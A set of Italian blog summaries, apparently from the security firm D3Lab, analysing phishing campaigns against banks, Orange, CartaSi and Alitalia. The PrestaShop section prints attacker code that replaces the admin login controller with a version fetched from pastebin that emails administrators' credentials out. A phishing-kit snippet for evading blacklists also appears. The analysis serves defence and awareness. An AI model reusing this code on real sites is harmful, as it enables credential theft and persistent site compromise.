Articoli di approfondimento sul Phishing Italiano e Internazionale con nozioni tecniche e metodi di prevenzione.
L’attività di monitoraggio a livello internazionale ha consentito a D3Lab di rilevare numerosi attacchi di phishing a danno di Orange S.A., la maggior società di telecomunicazioni francese operante nel campo della telefonia mobile, fissa e quale internet service provider, una delle principali aziende mondali del settore.
Gli attacchi gestiti dal 2014 rilevano un notevole incremento soprattutto quest’anno con 412 casi acquisiti sino ad oggi.
Durante l’analisi notturna abbiamo individuato un nuovo ente coinvolto nel Phishing, la Banca Popolare di Spoleto appartenente al Gruppo Banco Desio è un nuovo target per i Phisher e per i relativi cliente della banca.
Il kit sfrutta la codifica base64 per offuscare il sito internet utilizzato per diffondere il Phishing, l’utente riceve una eMail contenete uno short-link che rimanda ad una pagina PHP caricata su un sito compromesso tale pagina inoltrerà nuovamente l’utente ad una pagina locale generata sfruttando la capacità dei recenti browser di visualizzare e decodificare una pagina html in base64. Come è possibile notare nell’immagine di apertura nella barra dell’indirizzo non è presente un normale URL ma una porzione della stringa che genera la pagina HTML locale, per offuscare ulteriormente il tentativo di Phishing la stringa riporta inizialmente https://ihb2.cedaci.it/… che è effettivamente il sito legittimo del homebanking.
Invitiamo come di consueto gli utenti alla massima attenzione quando ricevono eMail di richiesta convalida credenziali.
L’attività di monitoraggio D3Lab ha consentito di individuare un tentativo di frode volto a colpire i clienti di CartaSi attraverso un messaggio di posta elettronica, con il quale l’utente viene invitato ad aggiornare i dati della carta di credito per motivi di sicurezza.
Un gruppo di criminali informatici in queste ore sta inviando centinaia di eMail ai danni della compagnia aerea Alitalia: l’utente viene avvisato che in cambio della compilazione di un questionario di gradimento dei servizi offerti dalla compagnia riceverà un rimborso di 80 €. Il promesso rimborso verrà accreditato sulla Carta di Credito del cliente, pertanto concluso il questionario vengono richieste le informazioni personali della vittima, il numero della carta di credito, la data di scadenza, il CVV e il SecureCode.
I dati forniti verranno sfruttati per effettuare acquisti o prelievi di denaro ai danni della vittima, non certamente per emettergli l’atteso rimborso.
Il kit costruito dai Phisher genera ad ogni accesso una nuova cartella casuale, generando da prima un numero casuale tra 0 e 100000, successivamente viene generato Hash MD5 di tale numero e infine codificato in base64. Un esempio della funzione sfruttata dai Phisher:
$random=rand(0,100000);
$md5=md5("$random");
$base=base64_encode($md5);
$dst=md5("$base");
function recurse_copy($src,$dst) {
...
...
Una volta generata la directory casuale all’interno di essa viene copiato il Kit di Phishing che la vittima visualizzerà. Questa tecnica è utile per eludere le BlackList e quindi l’avviso all’utente che sta visitando una possibile pagina fraudolenta poichè l’URL varierà ad ogni accesso.
Concludiamo con una galleria fotografica delle pagine di Phishing ai danni di Alitalia.
Durante l’analisi di un attacco di Phishing ai danni di un nostro cliente, con il supporto dell’amministratore del sito attaccato, abbiamo analizato come gli attaccanti abbiano alterato il Pannello di Amministratore di PrestaShop per inviare le credenziali dell’Admin via eMail.
Nel corso dell’ultimo trimestre cinque moduli esterni nel CMS PrestaShop sono risultati vulnerabili ad un attacco di tipo Remote Arbitrary File Upload, attacco che permette di caricare file di proprio piacimento sul sito internet vulnerabile.
Gli exploit, non diffusi attraverso i canonici canali dell’IT Security, permettono di sfruttare la vulnerabilità sui seguenti moduli:
Analizzando il backup che ci è stato cortesemente fornito dall’amministratore del sito compromesso abbiamo rilevato non solo la presenza di diverse web shell protette da password o meno ma la nostra attenzione è ricaduta sull’alterazione del pannello di amministratore.
L’alterazione ha lo scopo di fornire all’attaccante le credenziali del pannello di amministrazione, un efficace sistema per preservare l’accesso al sito, anche dopo una eventuale bonifica delle shell presenti nel sito, aggiornamento dei moduli vulnerabili o un comune cambio password.
Come avviene questa compromissione?
L’attaccante sfrutta uno dei moduli vulnerabili per caricare uno o più file PHP sul sito internet, quello di nostro interesse si chiama do.php esso è suddiviso in due parte. La prima parte esegue l’alterazione del pannello di amministratore, la seconda invece è un semplice uploader per caricare ulteriore materiale sul sito senza sfruttare le vulnerabilità dei moduli.
La nostra attenzione ricade sulla prima parte del file, ovvero:
$sss=array('/','../','../../','../../../','../../../../','../../../../../');
foreach($sss as $pa){
$p1=array("$pa/controllers/admin/AdminLoginController.php","$pa/controllers/AdminLoginController.php");
foreach($p1 as $path){
if (file_exists("$path")){
$html = @file_get_contents('http://pastebin.com/raw/XXXXXXXX');
$save=fopen($path,'w');
fwrite($save,$html);
echo "
./done panel
";
}
}
}
...
...
Questa porzione di codice individua inizialmente la presenza del file AdminLoginController.php, se presente lo sostituisce con il codice PHP pubblicato su PasteBin, il codice pubblicato sul famoso portale riprende integralmente il file originale di PrestaShop ma altera la funzione di verifica delle credenziali:
public function processLogin()
{
/* Check fields validity */
$passwd = trim(Tools::getValue('passwd'));
$email = trim(Tools::getValue('email'));
$to = "[email protected]";
$subject = "panel admin prestashop ". $_SERVER['SERVER_NAME'];
$header = "from: hacked <[email protected]>";
$message = "Link : http://" . $_SERVER['SERVER_NAME'] . $_SERVER['REQUEST_URI'] ."&up=hous \r\n email: $email \r\n pass: $passwd \r\n by bajatax -- sniper :v \r\n";
$message .= "Path : " . __file__;
$sentmail = @mail($to, $subject, $message, $header);
$sentmail1 = @mail($to, $subject, $message, $header);
if (empty($email)) {
$this->errors[] = Tools::displayError('Email is empty.');
} elseif (!Validate::isEmail($email)) {
$this->errors[] = Tools::displayError('Invalid email address.');
}
if (empty($passwd)) {
$this->errors[] = Tools::displayError('The password field is blank.');
} elseif (!Validate::isPasswd($passwd)) {
$this->errors[] = Tools::displayError('Invalid password.');
}
...
...
La funzione processLogin() ha normalmente il compito di verificare se le credenziali inserite sono corrette, ma attraverso questa alterazione l’attaccante riceverà via eMail le credenziali inserite dall’amministratore.
In seguito all’attacco rilevato nei giorni scorsi a danno di Cassa di Risparmio di Cesena, D3Lab ha eseguito un’analisi approfondita riguardante il dominio coinvolto.
Analizzando l’host si rileva che è stato creato in data 30-07-2015 come evidenziato nello screenshot sottostante e che risulta essere posizionato su un server ecuadoregno. Continua a leggere
Il monitoraggio di phishing internazionale ha consentito d individuare nella prima mattina odierna un tentativo di frode a danno di un nuovo ente, la Société Marseillaise de Crédit, banca principale del sud est della Francia con oltre 175 filiali di proprietà della francese Crédit du Nord.
Le monitorage du phishing international a permis de relever aujourd’hui en début de matinée une tentative de fraude aux dépens d’une nouvelle institution, la Société Marseillaise de Crédit, l’une des principales banques du sud est de la France où sont ouvertes 175 filiales appartenant à la banque française Crédit du Nord.
Già in passato avevamo parlato (Phishing con operatore per aggirare i token otp) di kit di phishing che permettevano all’operatore della struttura criminale di interagire con la vittima sfruttando il token otp in tempo reale.
Questa tipologia di kit, rilevata nell’autunno 2014, è nel tempo stata impiegata a danno dei clienti di Banca Intesa, Cariparma, Ubi Banca. Continua a leggere
Le attività svolte dal D3Lab nel rilevamento e contrasto al Phishing hanno permesso di scoprire l’utilizzo fraudolento dei loghi e del nome di un nuovo ente, Cassa di Risparmio di Cesena, ai danni degli utenti customers.
Il sito clone che vedete nell’immagine di apertura permette al Phisher di raccogliere le credenziali (Codice ID e Password) della vittima che ha precedentemente ricevuto una eMail di richiesta conferma dati. A differenza del sito originale che nel footer presenta l’orario corrente, nel clone è presente la data fissa del 1 Agosto 2016, probabile è la data in cui il Phisher ha clonato il sito autentico e quindi creato il kit di Phishing.
Digitate le credenziali l’utente viene reindirizzato al file check3.php tramite una chiamata POST contenente le credenziali digitate, tale file ha presumibilmente il compito di inviare a mezzo eMail le credenziali al Phisher e successivamente re-indirizzare il visitatore al sito ufficiale dell’istituito di credito.
Come sempre invitiamo gli utenti alla massima attenzione quando pervengono tramite eMail o SMS richieste di conferma dati.